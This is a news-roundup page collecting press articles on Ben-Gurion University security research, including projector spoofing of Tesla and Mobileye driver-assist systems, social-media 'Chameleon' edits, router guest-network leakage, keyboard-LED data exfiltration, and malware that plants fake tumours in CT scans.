How a $300 projector can fool Tesla’s Autopilot

Semi-autonomous driving systems don’t understand projected images. Six months ago, Ben Nassi, a PhD student at Ben-Gurion University advised by Professor Yuval Elovici, carried off a set of successful spoofing attacks against a Mobileye 630 Pro Driver Assist System using inexpensive drones and battery-powered projectors. Since then, he has expanded the technique to experiment—also successfully—with confusing a Tesla Model X and will be presenting his findings at the Cybertech Israel conference in Tel Aviv. The spoofing attacks largely rely on the difference between human and AI image recognition. For th...

Read More ...

Did you really ‘like’ that? How Chameleon attacks spring in Facebook, Twitter, LinkedIn

Social networks impacted seem to disagree on the scope of the attack. Social networks are full to the brim with our photos, posts,...

Read More ...

Singapore undergrads cut their teeth in Israel – land of start-ups and tech

Just before a group of Singaporean students made their way to Israel in May, worry hung over their heads. Rockets had been fired f...

Read More ...

New Cyberattack Warning For Millions Of Home Internet Routers: Report

Most routers used at home have a “guest network” feature nowadays, providing friends, visitors and contractors the opt...

Read More ...

Academics steal data from air-gapped systems via a keyboard’s LEDs

CTRL-ALT-LED technique can exfiltrate data from air-gapped systems using Caps Lock, Num Lock, and Scroll Lock LEDs. The Caps Lock,...

Read More ...

Signs from above: Drone with projector successfully trolls car AI

If the cars and the drones ever band together against us, we’re in trouble. After a recent demo using GNSS spoofin...

Read More ...

New computer attack mimics user’s keystroke characteristics and evades detection

Ben-Gurion University of the Negev (BGU) cyber security researchers have developed a new attack called Malboard. Malboard evades s...

Read More ...

Should cyber-security be more chameleon, less rhino?

Billions are being lost to cyber-crime each year, and the problem seems to be getting worse. So could we ever create unhackable co...

Read More ...

Computer virus alters cancer scan images

A computer virus that can add fake tumours to medical scan images has been created by cyber-security researchers. In laboratory tests, the malware altered 70 images and managed to fool three radiologists into believing patients had cancer. The altered images also managed to trick automated screening systems. The team from Israel developed the malicious software to show how easy it is to get around security protections for diagnostic equipment. The program was able to convincingly add fake malignant growths to images of lungs taken by MRI and CT scanning machines. The researchers, from Ben Gurion University’s cyber-security centre, ...

Read More ...

Hospital viruses: Fake cancerous nodes in CT scans, created by malware, trick radiologists

Researchers in Israel created malware to draw attention to serious security weaknesses in medical imaging equipment and networks. ...

Read More ...

Semi-autonomous driving systems don’t understand projected images.

Six months ago, Ben Nassi, a PhD student at Ben-Gurion University advised by Professor Yuval Elovici, carried off a set of successful spoofing attacks against a Mobileye 630 Pro Driver Assist System using inexpensive drones and battery-powered projectors. Since then, he has expanded the technique to experiment—also successfully—with confusing a Tesla Model X and will be presenting his findings at the Cybertech Israel conference in Tel Aviv.

The spoofing attacks largely rely on the difference between human and AI image recognition. For the most part, the images Nassi and his team projected to troll the Tesla would not fool a typical human driver—in fact, some of the spoofing attacks were nearly steganographic, relying on the differences in perception not only to make spoofing attempts successful but also to hide them from human observers.

Nassi created a video outlining what he sees as the danger of these spoofing attacks, which he called “Phantom of the ADAS,” and a small website offering the video, an abstract outlining his work, and the full reference paper itself. We don’t necessarily agree with the spin Nassi puts on his work—for the most part, it looks to us like the Tesla responds pretty reasonably and well to these deliberate attempts to confuse its sensors. We do think this kind of work is important, however, as it demonstrates the need for defensive design of semi-autonomous driving systems.

Nassi and his team’s spoofing of the Model X was carried out with a human assistant holding a projector, due to drone laws in the country where the experiments were carried out. But the spoof could have also been carried out by drone, as his earlier spoofing attacks on a Mobileye driver-assistance system were.

From a security perspective, the interesting angle here is that the attacker never has to be at the scene of the attack and doesn’t need to leave any evidence behind—and the attacker doesn’t need much technical expertise. A teenager with a $400 drone and a battery-powered projector could reasonably pull this off with no more know-how than “hey, it’d be hilarious to troll cars down at the highway, right?” The equipment doesn’t need to be expensive or fancy—Nassi’s team used several $200-$300 projectors successfully, one of which was rated for only 854×480 resolution and 100 lumens.

Of course, nobody should be letting a Tesla drive itself unsupervised in the first place—Autopilot is a Level 2 Driver Assistance System, not the controller for a fully autonomous vehicle. Although Tesla did not respond to requests for comment on the record, the company’s press kit describes Autopilot very clearly (emphasis ours):

Autopilot is intended for use only with a fully attentive driver who has their hands on the wheel and is prepared to take over at any time. While Autopilot is designed to become more capable over time, in its current form, it is not a self-driving system, it does not turn a Tesla into an autonomous vehicle, and it does not allow the driver to abdicate responsibility. When used properly, Autopilot reduces a driver’s overall workload, and the redundancy of eight external cameras, radar and 12 ultrasonic sensors provides an additional layer of safety that two eyes alone would not have.

Even the name “Autopilot” itself isn’t as inappropriate as many people assume—at least, not if one understands the reality of modern aviation and maritime autopilot systems in the first place. Wikipedia references the FAA’s Advanced Avionics Handbook when it defines autopilots as “systems that do not replace human operators, [but] instead assist them in controlling the vehicle.” On the first page of the Advanced Avionics Handbook’s chapter on automated flight control, it states: “In addition to learning how to use the autopilot, you must also learn when to use it and when not to use it.”

Within these constraints, even the worst of the responses demonstrated in Nassi’s video—that of the Model X swerving to follow fake lane markers on the road—doesn’t seem so bad. In fact, that clip demonstrates exactly what should happen: the owner of the Model X—concerned about what the heck his or her expensive car might do—hit the brakes and took control manually after Autopilot went in an unsafe direction.

The problem is, there’s good reason to believe that far too many drivers don’t believe they really need to pay attention. A 2019 survey demonstrated that nearly half of the drivers polled believed it was safe to take their hands off the wheel while Autopilot is on, and six percent even thought it was OK to take a nap. More recently, Sen. Edward Markey (D-Mass.) called for Tesla to improve the clarity of its marketing and documentation, and Democratic presidential candidate Andrew Yang went hands-free in a campaign ad—just as Elon Musk did before him, in a 2018 60 Minutes segment.

The time may have come to consider legislation about drones and projectors specifically, in much the same way laser pointers were regulated after they became popular and cheap. Some of the techniques used in the spoofing attacks carried out here could also confuse human drivers. And although human drivers are at least theoretically available, alert, and ready to take over for any confused AI system today, that won’t be the case forever. It would be a good idea to start work on regulations prohibiting spoofing of vehicle sensors before we no longer have humans backing them up.

Source: Ars Technica

Social networks impacted seem to disagree on the scope of the attack.

Social networks are full to the brim with our photos, posts, comments, and likes — the latter of which may be abused by attackers for the purposes of incrimination. 

A new paper, titled “The Chameleon Attack: Manipulating Content Display in Online Social Media,” has been published by academics from the Ben-Gurion University of the Negev (BGU), Israel, which suggests inherent flaws in social networks could give rise to a form of “Chameleon” attack. 

The team, made up of Aviad Elyashar, Sagi Uziel, Abigail Paradise, and Rami Puzis from the Telekom Innovation Laboratories and Department of Software and Information Systems Engineering, says that weaknesses in how posting systems are used on Facebook, Twitter and LinkedIn as well as other social media platforms, can be exploited to tamper with user activity in a way that could be “completely different, detrimental and potentially criminal.”

According to the research, published on arXiv.org, an interesting design flaw — rather than a security vulnerability, it should be noted — means that content including posts can be edited and changed without users that may have liked or commented being made aware of any shifts. 

Content containing redirect links, too, shortened for the purposes of brand management and to account for word count restrictions, may be susceptible and changed without notice. 

During experiments, the researchers used the Chameleon method to change publicly-posted videos on Facebook. Comments and like counts stayed the same, but there is no indication of alterations made available to anyone who previously interacted with the content. 

“Imagine watching and ‘liking’ a cute kitty video in your Facebook feed and a day later a friend calls to find out why you ‘liked’ a video of an ISIS execution,” says Dr. Rami Puzis, a researcher in the BGU Department of Software and Information Systems Engineering. “You log back on and find that indeed there’s a ‘like’ there. The repercussions from indicating support by liking something you would never do (Biden vs. Trump, Yankees vs. Red Sox, ISIS vs. US) from employers, friends, family, or government enforcement unaware of this social media scam can wreak havoc in just minutes.”  

Scams come to mind first, but in a world where propaganda, fake news, and troll farming runs rampant across social networks — the alleged interference of Russia in the previous US election being a prime example — as well as the close ties between our physical and digital identities, these design weaknesses may have serious ramifications for users. 

In a hypothetical attack scenario, the researchers say that a target could be selected and reconnaissance across a social network performed. Acceptable posts and links could then be created to “build trust” with an unaware victim — or group — before the switch is made via a Chameleon attack, quickly altering the target’s viewable likes and comments to relate to other content. 

“First and foremost, social network Chameleons can be used for shaming or incrimination, as well as to facilitate the creation and management of fake profiles in social networks,” Puzis says. “They can also be used to evade censorship and monitoring, in which a disguised post reveals its true self after being approved by a moderator.”

When contacted by the team, Facebook dismissed any concerns, labeling the issue as a phishing attack and therefore “such issues do not qualify under our bug bounty program.”

The LinkedIn team has begun an investigation. 

Both Facebook and LinkedIn, however, have partial mitigation in place as an icon is set when content is edited post-publication.

Twitter said the behavior was reported to the microblogging platform in the past, saying “while it may not be ideal, at this time, we do not believe this poses more of a risk than the ability to tweet a URL of any kind since the content of any web page may also change without warning.”

WhatsApp and Instagram are not generally susceptible to these attacks, whereas Reddit and Flickr may be.

“On social media today, people make judgments in seconds, so this is an issue that requires solving, especially before the upcoming US election,” Puzis says. 
 
The research will be presented in April at The Web Conference in Taipei, Taiwan. 

Source: ZDNet

Just before a group of Singaporean students made their way to Israel in May, worry hung over their heads.

Rockets had been fired from the Gaza Strip, hitting the southern Israeli city of Beersheba, where a few of the students from the Singapore University of Technology and Design (SUTD) were headed for an internship. No injury or death was reported, but news of the missile attacks made some of the students’ families a little uneasy.

Still, with reassurance from the university, the seven students, aged 20 to 23, went ahead with the trip.

Prior to their departure, SUTD kept in touch with the International SOS and held briefings for the students on developments in Israel and drills in case of emergencies.

None of the students heard any rocket sirens in the four months they were there.

They were the first batch of SUTD students to experience first-hand work in Israel, dubbed the land of start-ups and technology.

The seven of them belonged to either the information systems technology and design, or engineering systems and design specialisations.

Split across two start-ups and a research lab, they spent the past four months learning what it takes to be entrepreneurs and exploring research in cyber security. Their work stint ended last month.

SUTD had earlier this year established partnerships with two renowned Israeli universities – IDC Herzliya in Tel Aviv and Ben Gurion University (BGU) in Beersheba – making it the fourth Singapore university to send students to Israel for work or an exchange programme.

IN THE LAND OF CYBER DEFENCE

Israel is known for its Iron Dome, a missile defence system, but it has also been developing its cyber-security technologies.

At the forefront of these efforts is the Cyber@BGU, a research lab that delves into all sorts of projects on cyber security, big data analytics and applied research across fields.

This was also where three Singaporean SUTD students had the chance to work in, thanks to Professor Yuval Elovici, who wears two hats as the head of two cyber-security labs, one at SUTD and the other at Cyber@BGU.

Prof Yuval said that Beersheba, about 100km away from Tel Aviv, was named as Israel’s cyber capital, and the research lab is part of a larger high-tech park with large companies and start-ups.

By next year, about 4,000 tech experts will be working in the area, and eventually, this will grow to about 10,000, when the Israeli military moves its logistics, cyber-defence and technology units to the “smart campus”.

Third-year student Kevin Yee, 23, found it exciting to be in the heart of Beersheba. His junior, Mr Suhas Sahu, 22, worked on research to streamline huge chunks of data, and speed up detection of abnormalities in network traffic. The second-year student also started writing a research paper on the project for the lab.

For second-year student Sithanathan Bhuvaneswari, 20, her project was on the detection of tampered MRI scans, which were injected with fake cancer cells.

“Previously our only reference of cyber security was hacking in movies. But these projects about protecting identity and networks make everything more real, and it opens your eyes to the opportunities out there.”

A HOTBED FOR START-UPS

The other students were in Tel Aviv, the heart of Israel’s booming start-up scene.

Third-year student Eunice Lee, 21, was an intern at Pick a Pier, a company set up to make booking of docking spaces more efficient for marinas and boaters.

She was asked to create a smart algorithm to better match the supply of these spaces to the demand.

“I feel empowered in a start-up, where I have to be more accountable for my own work and make sure nothing goes wrong.”

She enjoyed her experience in Israel so much that she is even considering returning to work there full time after graduation.

In another part of the city, three students were based at I Know First, a fintech start-up that uses an advanced algorithm to analyse and predict the global stock market.

Their job roles included writing reports on the company’s predictive technology, comparing data with historical prices, and creating programming scripts to speed up data processing for the firm’s website.

Third-year student Jireh Tan, 23, who also helped to redesign the website, said: “I’ve always wanted to see what it’s like to work in a small environment, to really feel the responsibility of what I do every day.”

His peer Clarence Toh, 22, said: “Because start-ups are so small, you can see how they function and how they stay lean. Through this experience, I’ve seen how starting a business is not impossible, if you have a product that can meet demand.”

The Singapore University of Technology and Design (SUTD) ramped up overseas work opportunities for students in the past two years.
Overall demand to get work experience abroad has risen, with about 30 per cent more students going for overseas internships. This year, 103 students applied for 120 such positions, double the number of applicants last year.
Eventually, 47 students took up internships in 14 countries abroad this year. Some had either declined the positions offered or gone for local internships.
There is funding from SUTD and Enterprise Singapore for some internships abroad, and some companies and partners provide a small stipend, lodging, or meal and transport allowance.
Israel is one of the newest destinations for SUTD, which is Singapore’s fourth autonomous university.
SUTD president Chong Tow Chong said the university’s culture of entrepreneurship has made students more interested in start-ups.
“This has prompted us to expand our network of partnerships with start-up companies worldwide,” he said.
Eligible students who go on a four-month internship stint in Israel receive a sum of $5,400 from the Young Talent Programme grant, which is co-funded by Enterprise Singapore and the university.
The others, such as the National University of Singapore and Nanyang Technological University, have work programmes in Israel for their students, while the Singapore University of Social Sciences has shorter learning trips to the country.

Amelia Teng

Source: The Straits Times

Most routers used at home have a “guest network” feature nowadays, providing friends, visitors and contractors the option to get online without (seemingly) giving them access to a core home network. Unfortunately, a new report from researchers at Israel’s Ben-Gurion University of the Negev has now suggested that enabling such guest networks introduces a critical security vulnerability.

The advice from the researchers is to disable any guest networks—if you must have multiple networks at home, they warn, use separate hardware devices.

The implication isn’t that your plumber or telephone engineer might be in the employ of Iranian hackers, so don’t let them online—it is that the architecture of the router has a core vulnerability, one that enables contamination between its secure and less secure networks. The issue is more likely to hit through a printer or IoT device that has basic in-house access, but which you don’t think has access to the internet.

Because there is this contamination within the router itself, an attack on either network could open the other network to data leaks or the planting of a malicious hack. This means an attack on a poorly secured guest network would allow data to be harvested from the core network and delivered to a threat actor over the internet. None of which would be caught by the software-based defensive solutions in place.

The research team exposed the vulnerability by “overcoming” the logical network isolation between the two different networks “using specially-crafted network traffic.” In this way, it was possible to make the channels “leak data between the host network and the guest network,” and the report warns that an attack is possible even where an attacker “has very limited permissions on the infected device, and even an iframe hosting malicious JavaScript code can be used for this purpose.”

The methods did not enable the researchers to pull large amounts of device, but did break the security system and open the door. A targeted attack might only be looking for certain data, medical information or credentials for example. The vulnerability enables such an attack even where a guest network is not connected to the internet, but might have internal-only connectivity, the attack would then jump the fence and provide data to the outside actor.

What this means in practice is overloading the router such that it falls back on its covert internal architecture in an attempt to measure and manage its own performance. “Blocking this form of data transfer is more difficult, since it may require architectural changes to the router.” The researchers claim shared hardware resources must be made available to both networks for the router to function.

The same issue impacts businesses operating multiple networks without physical network separation—but organisational network security introduces other vulnerabilities around numbers of sign-ons and different levels of sensitivity. Air-gaps and access point control is on a different level to what is being reported here. But with almost all popular routers now offering the convenience of guest networks and with the researchers warning that “all of the routers surveyed—regardless of brand or price point—were vulnerable to at least some cross-network communication,” this is an issue that should concern home users first and foremost.

And while software tools can be deployed to plug some of the gaps uncovered, the researchers believe that to close the vulnerability without shutting down the functionality would require “a hardware-based solution—guaranteeing isolation between secure and non-secure network devices.” There is simply no way to guarantee security without hardware separation of the different networks.

As billions of new IoT devices are bought and connected, the levels of security in our homes and businesses becomes more critical and more difficult to manage. The bottom line here is that even providing restricted access to an IoT devices that might not seem to have any external connectivity could still allow that device to attack the core host network. And given that most of those IoT devices will be connected and forgotten and—dare I say it—made in China, that is an exposure.

The vendors of the tested hardware have been informed of the research findings—we await to see if any changes follow.

In the meantime, is your guest network under attack from foreign or domestic agents—should you panic and pull the plug? Of course not. But there is a vulnerability—it’s real and it has been tested and reported. The software-based network isolation used by your router, simply put, is not bulletproof and it should be. And so the advice is the same as it would be anyway—give some thought to whether a guest network is needed and to what devices and which people connect to your system.

CTRL-ALT-LED technique can exfiltrate data from air-gapped systems using Caps Lock, Num Lock, and Scroll Lock LEDs.

The Caps Lock, Num Lock, and Scroll Lock LEDs on a keyboard can be used to exfiltrate data from a secure air-gapped system, academics from an Israeli university have proved.

The attack, which they named CTRL-ALT-LED, is nothing that regular users should worry about but is a danger for highly secure environments such as government networks that store top-secret documents or enterprise networks dedicated to storing non-public proprietary information.

HOW CTRL-ALT-DEL WORKS

The attack requires some pre-requisites, such as the malicious actor finding a way to infect an air-gapped system with malware beforehand. CTRL-ALT-LED is only an exfiltration method.

But once these prerequisites are met, the malware running on a system can make the LEDs of an USB-connected keyboard blink at rapid speeds, using a custom transmission protocol and modulation scheme to encode the transmitted data.

A nearby attacker can record these tiny light flickers, which they can decode at a later point, using the same modulation scheme used to encode it.

The research team behind this exfiltration method says it tested the CTRL-ALT-LED technique with various optical capturing devices, such as a smartphone camera, a smartwatch’s camera, security cameras, extreme sports cameras, and even high-grade optical/light sensors.

Some attacks require an “evil maid” scenario, where the attacker needs to be physically present to record the LED flickers — either using his smartphone or smartwatch.

However, other scenarios are more doable, with the attacker taking over CCTV surveillance systems that have a line of sight of the keyboard LEDs.

Keyboard LED transmissions can also be scheduled at certain intervals of the day when users aren’t around. This also makes it easier for attackers to sync recordings or place optical recorders or cameras near air-gapped targets only at the time they know the LEDs will be transmitting stolen info.

During experiments, the research team — from the Ben-Gurion University of the Negev in Israel — said they’ve recorded exfiltration speeds of up to 3000 bit/sec per LED when they used sensitive light sensors, and around 120 bit/sec speeds when they used a normal smartphone camera.

Speeds varied depending on the camera’s sensitivity and distance from the keyboard. Keyboard models didn’t play a role in exfiltration speeds, and no vendor had keyboards that were more vulnerable to this exfiltration method than others. Bit error rates in recovering the stolen data varied between acceptable 3% rates to larger 8% values.

PRIOR RESEARCH

But the technique the Ben Gurion research crew tested with modern hardware isn’t actually new. A research paper published in 2002 first warned that data exfiltration via keyboard LEDs was technically possible.

Furthermore, the same Ben Gurion team was also behind similar research in the past. The first is called LED-it-GO, an exfiltration technique that uses hard drive LEDs, and the second is xLED, a similar method that exfiltrates data from routers and switches using their status lights.

As this article stated right at the beginning, regular users have nothing to fear from the technique described in this article. Malware usually has far better and faster methods of stealing data from infected computers. This is something that administrators of air-gapped networks need to take into consideration.

The Ben-Gurion team listed various countermeasures against this attack in their white paper, titled “CTRL-ALT-LED: Leaking Data from Air-Gapped Computers Via Keyboard LEDs.”

The research team will present their findings next week, on July 18, at the COMPSAC conference, held in Milwaukee, Wisconsin, USA.

Source: ZDNet

If the cars and the drones ever band together against us, we’re in trouble.

After a recent demo using GNSS spoofing confused a Tesla, a researcher from Cyber@BGU reached out about an alternative bit of car tech foolery. The Cyber@GBU team recently demonstrated an exploit against a Mobileye 630 PRO Advanced Driver Assist System (ADAS) installed on a Renault Captur, and the exploit relies on a drone with a projector faking street signs.

The Mobileye is a Level 0 system, which means it informs a human driver but does not automatically steer, brake, or accelerate the vehicle. This unfortunately limits the “wow factor” of Cyber@BGU’s exploit video—below, we can see the Mobileye incorrectly inform its driver that the speed limit has jumped from 30km/h to 90km/h (18.6 to 55.9 mph), but we don’t get to see the Renault take off like a scalded dog in the middle of a college campus. It’s still a sobering demonstration of all the ways tricky humans can mess with immature, insufficiently trained AI.

A Renault Captur, equipped with a Mobileye 630 Pro ADAS, is driven down a narrow university street. When a drone projects a fake speed limit sign on a building, the Mobileye 630 notifies its human driver that the speed limit has changed.

Ben Nassi, a PhD student at CBG and member of the team spoofing the ADAS, created both the video and a page succinctly laying out the security-related questions raised by this experiment. The detailed academic paper the university group prepared goes further in interesting directions than the video—for instance, the Mobileye ignored signs of the wrong shape, but the system turned out to be perfectly willing to detect signs of the wrong color and size. Even more interestingly, 100ms was enough display time to spoof the ADAS even if that’s brief enough that many humans wouldn’t spot the fake sign at all. The Cyber@BGU team also tested the influence of ambient light on false detections: it was easier to spoof the system late in the afternoon or at night, but attacks were reasonably likely to succeed even in fairly bright conditions.

Spoofing success rate at various levels of ambient light. Roughly speaking, the range shown here is twilight on the left to noon on a cloudy day at the right.

Ars reached out to Mobileye for response and sat in on a conference call this morning with senior company executives. The company does not believe that this demonstration counts as “spoofing”—they limit their own definition of spoofing to inputs that a human would not be expected to recognize as an attack at all (I disagreed with that limited definition but stipulated it). We can call the attack whatever we like, but at the end of the day, the camera system accepted a “street sign” as legitimate that no human driver ever would. This was the impasse the call could not get beyond. The company insisted that there was no exploit here, no vulnerability, no flaw, and nothing of interest. The system saw an image of a street sign—good enough, accept it and move on.

To be completely fair to Mobileye, again, this is just a level 0 ADAS. There’s very little potential here for real harm given that the vehicle is not meant to operate autonomously. However, the company doubled down and insisted that this level of image recognition would also be sufficient in semi-autonomous vehicles, relying only on other conflicting inputs (such as GPS) to mitigate the effects of bad data injected visually by an attacker. Cross-correlating input from multiple sensor suites to detect anomalies is good defense in depth, but even defense in depth may not work if several of the layers are tissue-thin.

This isn’t the first time we’ve covered the idea of spoofing street signs to confuse autonomous vehicles. Notably, a project in 2017 played with using stickers in an almost-steganographic way: alterations that appeared to be innocent weathering or graffiti to humans could alter the meaning of the signs entirely to AIs, which may interpret shape, color, and meaning differently than humans do.

However, there are a few new factors in BGU’s experiment that make it interesting. No physical alteration of the scenery is required; this means no chain of physical evidence, and no human needs to be on the scene. It also means setup and teardown time amounts to “how fast does your drone fly?” which may even make targeted attacks possible—a drone might acquire and shadow a target car, then wait for an optimal time to spoof a sign in a place and at an angle most likely to affect the target with minimal “collateral damage” in the form of other nearby cars also reading the fake sign. Finally, the drone can operate as a multi-pronged platform—although BGU’s experiment involved a visual projector only, a more advanced attacker might combine GNSS spoofing and perhaps even active radar countermeasures in a very serious bid at confusing its target.

Source: Ars Technica

Ben-Gurion University of the Negev (BGU) cyber security researchers have developed a new attack called Malboard. Malboard evades several detection products that are intended to continuously verify the user’s identity based on personalized keystroke characteristics.

The new paper, “Malboard: A Novel User Keystroke Impersonation Attack and Trusted Detection Framework Based on Side-Channel Analysis,” published in the Computer and Security journal, reveals a sophisticated attack in which a compromised USB keyboard automatically generates and sends malicious keystrokes that mimic the attacked user’s behavioral characteristics.

Keystrokes generated maliciously do not typically match human typing and can easily be detected. Using artificial intelligence, however, the Malboard attack autonomously generates commands in the user’s style, injects the keystrokes as malicious software into the keyboard and evades detection. The keyboards used in the research were products by Microsoft, Lenovo and Dell.

“In the study, 30 people performed three different keystroke tests against three existing detection mechanisms including KeyTrac, TypingDNA and DuckHunt. Our attack evaded detection in 83 percent to 100 percent of the cases,” says Dr. Nir Nissim, head of the David and Janet Polak Family Malware Lab at Cyber@BGU, and a member of the BGU Department of Industrial Engineering and Management. “Malboard was effective in two scenarios: by a remote attacker using wireless communication to communicate, and by an inside attacker or employee who physically operates and uses Malboard.”

New Detection Modules Proposed

Both the attack and detection mechanisms were developed as part of the master’s thesis of Nitzan Farhi, a BGU student and member of the USBEAT project at BGU’s Malware Lab.

“Our proposed detection modules are trusted and secured, based on information that can be measured from side-channel resources, in addition to data transmission,” Farhi says. “These include (1) the keyboard’s power consumption; (2) the keystrokes’ sound; and (3) the user’s behavior associated with his or her ability to respond to typographical errors.”

Dr. Nissim adds, “Each of the proposed detection modules is capable of detecting the Malboard attack in 100 percent of the cases, with no misses and no false positives. Using them together as an ensemble detection framework will assure that an organization is immune to the Malboard attack as well as other keystroke attacks.”

The researchers propose using this detection framework for every keyboard when it is initially purchased and daily at the outset, since sophisticated malicious keyboards can delay their malicious activity for a later time period. Many new attacks can detect the presence of security mechanisms and thus manage to evade or disable them.

The BGU researchers plan to expand work on other popular USB devices, including computer mouse user movements, clicks and duration of use. They also plan to enhance the typo insertion detection module and combine it with other existing keystroke dynamic mechanisms for user authentication since this behavior is difficult to replicate.

Source: Tech Xplore

Do we need to rethink our approach to cybersecurity?

Billions are being lost to cyber-crime each year, and the problem seems to be getting worse. So could we ever create unhackable computers beyond the reach of criminals and spies? Israeli researchers are coming up with some interesting solutions.

The key to stopping the hackers, explains Neatsun Ziv, vice president of cyber-security products at Tel Aviv-based Check Point Security Technologies, is to make hacking unprofitable.

“We’re currently tracking 150 hacking groups a week, and they’re making $100,000 a week each,” he tells the BBC.

“If we raise the bar, they lose money. They don’t want to lose money.”

This means making it difficult enough for hackers to break in that they choose easier targets.

And this has been the main principle governing the cyber-security industry ever since it was invented – surrounding businesses with enough armour plating to make it too time-consuming for hackers to drill through. The rhinoceros approach, you might call it.

But some think the industry needs to be less rhinoceros and more chameleon, camouflaging itself against attack.


The six generations of cyber-attacks

GETTY IMAGES

1991: Floppy discs are infected with malicious software that attacks any PC they are inserted into

1994: Attackers access company intranets to steal data

1997: Hackers fool web servers into giving them access, exploiting server vulnerabilities

2006: Attackers start finding “zero-day” – previously unknown – bugs in all types of commonly-used software and use them to sneak into networks or send malware disguised as legitimate file attachments

2016: Hackers use multi-pronged attacks, combining worms and ransomware, powerful enough to attack entire networks at once

2019: Hackers start attacking internet of things connected devices.

Source: Check Point Software Technologies


“We need to bring prevention back into the game,” says Yuval Danieli, vice president of customer services at Israeli cyber-security firm Morphisec.

“Most of the world is busy with detection and remediation – threat hunting – instead of preventing the cyber-attack before it occurs.”

Morphisec – born out of research done at Ben-Gurion University – has developed what it calls “moving target security”. It’s a way of scrambling the names, locations and references of each file and software application in a computer’s memory to make it harder for malware to get its teeth stuck in to your system.

The mutation occurs each time the computer is turned on so the system is never configured the same way twice. The firm’s tech is used to protect the London Stock Exchange and Japanese industrial robotics firm Yaskawa, as well as bank and hotel chains.

But the most effective way to secure a computer is to isolate it from local networks and the internet completely – so-called air gapping. You would need to gain physical access to the computer to steal data.

Yuval Elovici believes that no way of protecting a computer is 100% reliable

Yuval Elovici, head of the cyber-security research centre at Ben-Gurion University, warns that even this method isn’t 100% reliable.

“The obvious way to attack an air-gapped machine is to compromise it during the supply chain when it is being built,” he says.

“So you then have a compromised air-gapped computer in a nuclear power station that came with the malware – the attacker never has to enter the premises.”

Indeed, in October last year, Bloomberg Businessweek alleged that Chinese spies had managed to insert chips on servers made in China that could be activated once the machines were plugged in overseas. The servers were manufactured for US firm Super Micro Computer Inc.

The story suggested that Amazon Web Services (AWS) and Apple were among 30 companies, as well as government agencies and departments, that had used the suspect servers.

Apple and Amazon strenuously denied the claims.

While air gapping is impractical for many businesses, so-called “co-operative cyber-security” is being seen as another way to thwart the hackers.

Imagine there are four firms working together: Barclays, Microsoft, Google and a cyber-security company, say.

Each of the four firms gives a piece of data to each other. They don’t know what the data is that they are protecting, but they hold it in their networks.

In order to access sensitive information from any of the firms, attackers would need to hack all four networks and work out which piece of data is missing, to be able to make any sense of the files stolen.

“If the likelihood of breaking into a single network is 1%, then to penetrate four different networks, the likelihood would become 0.000001%,” explains Alon Cohen, founder of cyber-security firm nsKnox and former chief technology officer for the Israeli military.

Check Point’s Neatsun Ziv believes “there’s no such thing as an unhackable computer”

He calls the concept “crypto-splitting”, and it involves encoding each sequence of data as thousands of numbers then dividing these cryptographic puzzles between the four companies.

“You would need to solve thousands of puzzles in order to put the data back together,” says Mr Cohen.

Check Point also collaborates with large multinational technology firms in a data-sharing alliance in the belief that co-operation is key to staying one step ahead of the hackers.

But while such approaches show promise, Check Point’s Neatsun Ziv concludes that: “There is no such thing as an unhackable computer, the only thing that exists is the gap between what you build and what people know how to hack today.”

There is always a trade-off between usability and security. The more secure and hack-proof a computer is, the less practical it is in a networked world.

“Yes, we can build an unhackable computer …but it would be like a tank with so many shields that it wouldn’t move anywhere,” says Morphisec’s Mr Danieli.

The concern for the cyber-security industry is that as the nascent “internet of things” develops, powered by 5G mobile connectivity, the risk of cyber-attack will only increase.

And as artificial intelligence becomes more widespread, it will become just another tool hackers can exploit.

The arms race continues.

Source: BBC News

A computer virus that can add fake tumours to medical scan images has been created by cyber-security researchers.

The experimental malware could add fake tumours and other signs of disease to scans
BBC SCIENCE PHOTO LIBRARY

In laboratory tests, the malware altered 70 images and managed to fool three radiologists into believing patients had cancer.

The altered images also managed to trick automated screening systems.

The team from Israel developed the malicious software to show how easy it is to get around security protections for diagnostic equipment.

The program was able to convincingly add fake malignant growths to images of lungs taken by MRI and CT scanning machines.

The researchers, from Ben Gurion University’s cyber-security centre, said the malware could also remove actual malignant growths from image files to prevent patients who are targets getting the care they need.

The images targeted were scans of lungs but the malware could be tuned to produce other fake conditions such as brain tumours, blood clots, fractures or spinal problems, according to the Washington Post, which first reported on the research.

Images and scans were vulnerable, said the researchers, because the files were generally not digitally signed or encrypted. This means any changes would be hard to spot.

The researchers suggested the security flaws could be exploited to sow doubt about the health of government figures, sabotage research, commit insurance fraud or as part of a terrorist attack.

In addition, they said, weaknesses in the way hospitals and health care centres protect their networks could give attackers easy access.

While hospitals were careful about sharing sensitive data beyond their boundaries, they took much less care when handling data internally, said one of the researchers.

“What happens within the hospital system itself, which no regular person should have access to in general, they tend to be pretty lenient about,” Yisroel Mirsky told the Washington Post.

Better use of encryption and digital signatures could help hospitals avoid problems if cyber-attackers tried to subvert images, he added.

Hospitals and other healthcare organisations have been a popular target for cyber-attackers and many have been hit by malicious ransomware that encrypts files and only returns the data when victims pay up.

The NHS was hit hard in 2017 by the WannaCry ransomware which left many hospitals scrambling to recover data.

Source: BBC News

Researchers in Israel created malware to draw attention to serious security weaknesses in medical imaging equipment and networks.

(iStock) (JohnnyGreig/(iStock))

When Hillary Clinton stumbled and coughed through public appearances during her 2016 presidential run, she faced critics who said that she might not be well enough to perform the top job in the country. To quell rumors about her medical condition, her doctor revealed that a CT scan of her lungs showed that she just had pneumonia.

But what if the scan had shown faked cancerous nodules, placed there by malware exploiting vulnerabilities in widely used CT and MRI scanning equipment? Researchers in Israel say they have developed such malware to draw attention to serious security weaknesses in critical medical imaging equipment used for diagnosing conditions and the networks that transmit those images — vulnerabilities that could have potentially life-altering consequences if unaddressed.

The malware they created would let attackers automatically add realistic, malignant-seeming growths to CT or MRI scans before radiologists and doctors examine them. Or it could remove real cancerous nodules and lesions without detection, leading to misdiagnosis and possibly a failure to treat patients who need critical and timely care.

Yisroel Mirsky, Yuval Elovici and two others at the Ben-Gurion University Cyber Security Research Center in Israel who created the malware say that attackers could target a presidential candidate or other politicians to trick them into believing they have a serious illness and cause them to withdraw from a race to seek treatment.

The research isn’t theoretical. In a blind study the researchers conducted involving real CT lung scans, 70 of which were altered by their malware, they were able to trick three skilled radiologists into misdiagnosing conditions nearly every time. In the case of scans with fabricated cancerous nodules, the radiologists diagnosed cancer 99 percent of the time. In cases where the malware removed real cancerous nodules from scans, the radiologists said those patients were healthy 94 percent of the time.

